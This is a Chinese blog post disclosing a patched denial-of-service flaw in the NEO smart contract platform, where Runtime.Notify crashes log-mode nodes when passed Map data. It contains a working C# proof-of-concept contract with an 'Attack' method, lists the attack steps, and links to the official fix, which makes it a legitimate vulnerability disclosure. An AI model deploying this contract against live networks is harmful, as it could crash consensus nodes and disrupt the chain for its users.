<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.9.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="— 发现的第一个0day —">
<meta name="keywords" content="0day漏洞,NEO,区块链">
<meta property="og:type" content="article">
<meta property="og:title" content="0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞">
<meta property="og:url" content="http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/index.html">
<meta property="og:site_name" content="啦啦菌NODE">
<meta property="og:description" content="— 发现的第一个0day —">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://ww4.sinaimg.cn/large/006iKNp3gy1fv94rl0idqj30gq0an0td.jpg">
<meta property="og:image" content="http://ww2.sinaimg.cn/large/006iKNp3gy1fv95qd5r2vj30op088t9n.jpg">
<meta property="og:image" content="http://ww4.sinaimg.cn/large/006iKNp3gy1fv95n8ki1dj30p40ag75w.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006iKNp3gy1fv96cituh5j311x0k57ts.jpg">
<meta property="og:image" content="http://ww3.sinaimg.cn/large/006iKNp3gy1fv96cv6vy6j311y0k81kb.jpg">
<meta property="og:image" content="http://ww3.sinaimg.cn/large/006iKNp3gy1fv98b8qv3ij30ef09vt9c.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006iKNp3gy1fv97ec5hi5j30o80g6t9q.jpg">
<meta property="og:updated_time" content="2019-08-20T07:12:32.333Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞">
<meta name="twitter:description" content="— 发现的第一个0day —">
<meta name="twitter:image" content="http://ww4.sinaimg.cn/large/006iKNp3gy1fv94rl0idqj30gq0an0td.jpg">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2018/09/26/Tools-nmap/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2018/08/29/智能合约安全-重入攻击/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&text=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&title=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&is_video=false&description=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞&body=Check out this article: http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&title=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&title=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&title=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&title=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&name=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞&description=&lt;p&gt;— 发现的第一个0day —&lt;/p&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#漏洞"><span class="toc-number">2.</span> <span class="toc-text">漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞产生原因"><span class="toc-number">2.1.</span> <span class="toc-text">漏洞产生原因</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞攻击过程"><span class="toc-number">2.2.</span> <span class="toc-text">漏洞攻击过程</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#漏洞修补"><span class="toc-number">3.</span> <span class="toc-text">漏洞修补</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#最后"><span class="toc-number">4.</span> <span class="toc-text">最后</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">啦啦菌NODE</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2018-09-15T09:05:28.000Z" itemprop="datePublished">2018-09-15</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/0day漏洞/">0day漏洞</a>, <a class="tag-link" href="/tags/NEO/">NEO</a>, <a class="tag-link" href="/tags/区块链/">区块链</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>— 发现的第一个0day —</p>
<a id="more"></a>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><hr>

<p>在实验室改以太坊的智能合约到neo。<br>改着改着发现一个拒绝服务攻击漏洞，利用攻击的话危害还挺大的，emmm，发现基本全靠运气，在此记录第一个0day。</p>
<h1 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h1><hr>

<p><strong>漏洞名称</strong>：NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞<br><strong>漏洞影响</strong>：导致Neo链上所有开启<code>log模式</code>的全节点崩溃（包括共识节点）。<br><strong>漏洞细节</strong>：出现在neo全节点虚拟机中执行智能合约语句Runtime.Notify()时发生崩溃</p>
<p>Neo智能合约平台为合约提供了记录数据信息输出到文件的系统调用<code>System.Runtime.Notify</code>。该调用在处理合约请求时未考虑到全部可能的数据结构，将导致智能合约系统平台crash。</p>
<p>其产生的影响会根据节点的部署情况而有所不同，但是都较为严重。</p>
<p>由于Neo目前是有7个主节点负责验证并打包全网交易。恶意用户将利用该漏洞的恶意合约发布到neo网络中，假如超过4个主节点开启了LOG功能，这些节点在解析运行该恶意合约时将引发崩溃，无法继续达成共识，进而导致整个neo网络拒绝服务。</p>
<p>即使主节点不使用LOG可以完成共识正常出块，但是NEO链中所有NEP5代币智能合约都会使用LOG功能，几乎所有DAPP也会使用LOG功能。所有LOG节点崩溃，会使基于NEO链的大部分智能合约瘫痪。</p>
<p>崩溃截图：<br><img src="http://ww4.sinaimg.cn/large/006iKNp3gy1fv94rl0idqj30gq0an0td.jpg" alt="崩溃截图"></p>
<h2 id="漏洞产生原因"><a href="#漏洞产生原因" class="headerlink" title="漏洞产生原因"></a>漏洞产生原因</h2><p>在执行Runtime.Notify没有考虑所有可能被 Runtime.Notify 写入日志文件的数据类型，在数据转化时解析出错。</p>
<p>Runtime.Notify 是记录智能合约日志的功能，可以输出想要知道的数据的值。类似于<code>console.log()</code>，输出的数据会写入LevevlDB数据库，最后变为一个文件。</p>
<p><img src="http://ww2.sinaimg.cn/large/006iKNp3gy1fv95qd5r2vj30op088t9n.jpg" alt></p>
<p>判断是否是log模式</p>
<p><img src="http://ww4.sinaimg.cn/large/006iKNp3gy1fv95n8ki1dj30p40ag75w.jpg" alt></p>
<p>构建文件，写入文件</p>
<p>其中<code>ToParameter函数</code>在转化Map格式时崩溃。</p>
<blockquote>
<p>官方回复：因为ToParameter函数在实现的时候还没有Map，后来做了Map功能后忘记更新ToParameter了。</p>
</blockquote>
<p>ToParameter函数，在官方github中的NEO项目中<code>ContractParameter.cs</code>、<code>ContractParameterType.cs</code>、<code>Helper.cs</code>实现</p>
<h2 id="漏洞攻击过程"><a href="#漏洞攻击过程" class="headerlink" title="漏洞攻击过程"></a>漏洞攻击过程</h2><p><code>攻击过程</code>：</p>
<ul>
<li>构建恶意智能合约代码</li>
<li>部署智能合约</li>
<li>调用恶意智能合约</li>
<li>所有开启log功能的节点同步区块,执行智能合约代码，崩溃。（如果共识节点开启log功能，会直接崩溃，不会产生区块）</li>
</ul>
<p>当时提交的智能合约POC分析：<br>（复杂版，当时没有去看源码觉得有两种漏洞原因，以为可能是跟360找到的漏洞一样，因为map与struct嵌套导致漏洞，也有可能是因为其中一种结构，没有排除到根本）</p>
<figure class="highlight cs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">using</span> Neo.SmartContract.Framework;</span><br><span class="line"><span class="keyword">using</span> Neo.SmartContract.Framework.Services.Neo;</span><br><span class="line"><span class="keyword">using</span> Neo.SmartContract.Framework.Services.System;</span><br><span class="line"><span class="keyword">using</span> Helper = Neo.SmartContract.Framework.Helper;</span><br><span class="line"><span class="keyword">using</span> System;</span><br><span class="line"><span class="keyword">using</span> System.Numerics;</span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">NeoContract1</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">class</span> <span class="title">test</span> : <span class="title">SmartContract</span></span><br><span class="line">    &#123;</span><br><span class="line"></span><br><span class="line">        <span class="comment">//结构体</span></span><br><span class="line">        <span class="comment">//以 (byte[]) fileid - (结构体) Upload 为键值对 的 Map结构 （map_Up开头）</span></span><br><span class="line">        <span class="comment">//以 (byte[]) fileid - (结构体) Purchase 为键值对 的 Map结构 </span></span><br><span class="line"></span><br><span class="line">        <span class="comment">// Upload结构体</span></span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">class</span> <span class="title">Upload</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">public</span> <span class="keyword">byte</span>[] fileID; <span class="comment">// fileID</span></span><br><span class="line">            <span class="keyword">public</span> Map&lt;<span class="keyword">byte</span>[], Purchase&gt; map_Pu;   <span class="comment">//Map结构</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">//Purchase结构体</span></span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">class</span> <span class="title">Purchase</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">public</span> <span class="keyword">byte</span>[] fileID;</span><br><span class="line">        &#125;</span><br><span class="line">.....省略合约入口.........</span><br><span class="line">        <span class="comment">//攻击调用</span></span><br><span class="line">        <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">bool</span> <span class="title">Attack</span>(<span class="params"><span class="keyword">byte</span>[] fileID</span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            Map&lt;<span class="keyword">byte</span>[], Purchase&gt; map_Pu = <span class="keyword">new</span> Map&lt;<span class="keyword">byte</span>[], Purchase&gt;();</span><br><span class="line">            <span class="comment">//新建Purchase结构体</span></span><br><span class="line">            Purchase pu = <span class="keyword">new</span> Purchase</span><br><span class="line">            &#123;</span><br><span class="line">                fileID = fileID,</span><br><span class="line">            &#125;;</span><br><span class="line">            map_Pu[fileID] = pu;</span><br><span class="line">            <span class="comment">//新建外部upload结构体</span></span><br><span class="line">            Upload up = <span class="keyword">new</span> Upload</span><br><span class="line">            &#123;</span><br><span class="line">                fileID = fileID,</span><br><span class="line">                map_Pu = map_Pu,</span><br><span class="line">            &#125;;</span><br><span class="line">            <span class="comment">//存储upload结构体</span></span><br><span class="line">            StorageMap map_Up = Storage.CurrentContext.CreateMap(<span class="string">"map_Up"</span>);</span><br><span class="line">            map_Up.Put(fileID, up.Serialize());</span><br><span class="line"></span><br><span class="line">            Runtime.Notify(<span class="string">"OK"</span>);</span><br><span class="line"></span><br><span class="line">            <span class="comment">//得到fileID对应的Upload</span></span><br><span class="line">            Upload map_fileID = GetUpload(fileID);</span><br><span class="line">            <span class="comment">//问题出在这里！！！！！！！！！！！！！！！！此处崩溃</span></span><br><span class="line">            Runtime.Notify(map_fileID);</span><br><span class="line">            Runtime.Notify(map_fileID.fileID);</span><br><span class="line">            <span class="comment">//估计就是两句中上面的第一句</span></span><br><span class="line">            <span class="comment">//可能1. 一个结构体 因为结构中的非法字符 在解析写入文件的时候 导致崩溃 （可能因为结构体 其中包含着不在预期估计范围的作为结构体分割 的字符）</span></span><br><span class="line">            <span class="comment">//可能2. 一个多层嵌套 map struct 的结构体 因为多层嵌套的原因 在解析没有预计 导致崩溃</span></span><br><span class="line"></span><br><span class="line">            <span class="comment">//得到upload的map_Pu 中对应</span></span><br><span class="line">            Map&lt;<span class="keyword">byte</span>[], Purchase&gt; map_Pu_2 = map_fileID.map_Pu;</span><br><span class="line">            Runtime.Notify(map_Pu_2[fileID]);</span><br><span class="line"></span><br><span class="line">            <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> Upload <span class="title">GetUpload</span>(<span class="params"><span class="keyword">byte</span>[] fileID</span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            StorageMap map_Up = Storage.CurrentContext.CreateMap(<span class="string">"map_Up"</span>);</span><br><span class="line"></span><br><span class="line">            <span class="keyword">var</span> bytes = map_Up.Get(fileID);</span><br><span class="line">            <span class="keyword">if</span> (bytes.Length &gt; <span class="number">0</span>)</span><br><span class="line">            &#123;</span><br><span class="line">               <span class="keyword">return</span> Helper.Deserialize(bytes) <span class="keyword">as</span> Upload;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="keyword">return</span> <span class="keyword">new</span> Upload();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>按照官方的原因的话，应该直接建立一个MAP结构，Runtime.Notify(MAP)格式，就可以，不用向上面那么复杂</p>
<p>贴上攻击结果的一些截图：</p>
<p>共识节点开启log：<br><img src="http://ww1.sinaimg.cn/large/006iKNp3gy1fv96cituh5j311x0k57ts.jpg" alt></p>
<p>共识节点不开启log：<br><img src="http://ww3.sinaimg.cn/large/006iKNp3gy1fv96cv6vy6j311y0k81kb.jpg" alt></p>
<h1 id="漏洞修补"><a href="#漏洞修补" class="headerlink" title="漏洞修补"></a>漏洞修补</h1><p>官方于09.10修补了漏洞,添加了map对应处理情况。<a href="https://github.com/neo-project/neo/commit/e5e64ad5d413ad53effb6f815eac579df2c3aaf9#diff-724a2c89065b167abd6abdd780331db8" target="_blank" rel="noopener">修复情况链接</a></p>
<p><img src="http://ww3.sinaimg.cn/large/006iKNp3gy1fv98b8qv3ij30ef09vt9c.jpg" alt></p>
<p><img src="http://ww1.sinaimg.cn/large/006iKNp3gy1fv97ec5hi5j30o80g6t9q.jpg" alt></p>
<h1 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h1><p>很感谢学长和老师（就不贴出名字了）引入门的指导，一直以来的支持和照顾。这也是能发现0day不可或缺的先前条件。</p>
<p>信息安全就是如此，潜心学习，沉淀，耐心研究，挖掘，总有收获。<br>共勉。</p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>加载评论需要在浏览器启用 JavaScript 脚本支持。</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#漏洞"><span class="toc-number">2.</span> <span class="toc-text">漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞产生原因"><span class="toc-number">2.1.</span> <span class="toc-text">漏洞产生原因</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞攻击过程"><span class="toc-number">2.2.</span> <span class="toc-text">漏洞攻击过程</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#漏洞修补"><span class="toc-number">3.</span> <span class="toc-text">漏洞修补</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#最后"><span class="toc-number">4.</span> <span class="toc-text">最后</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&text=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&title=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&is_video=false&description=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞&body=Check out this article: http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&title=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&title=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&title=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&title=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://lalajun.com/2018/09/15/0day-NEO智能合约平台Runtime.Notify()调用拒绝服务漏洞/&name=0day-NEO智能合约平台Runtime.Notify调用拒绝服务漏洞&description=&lt;p&gt;— 发现的第一个0day —&lt;/p&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 LaLa
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<!-- clipboard -->

  <script src="/lib/clipboard/clipboard.min.js"></script>
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight .code pre").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      target: function(trigger) {
        return trigger.nextElementSibling;
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>

<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'lalajun';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>


</body>
</html>
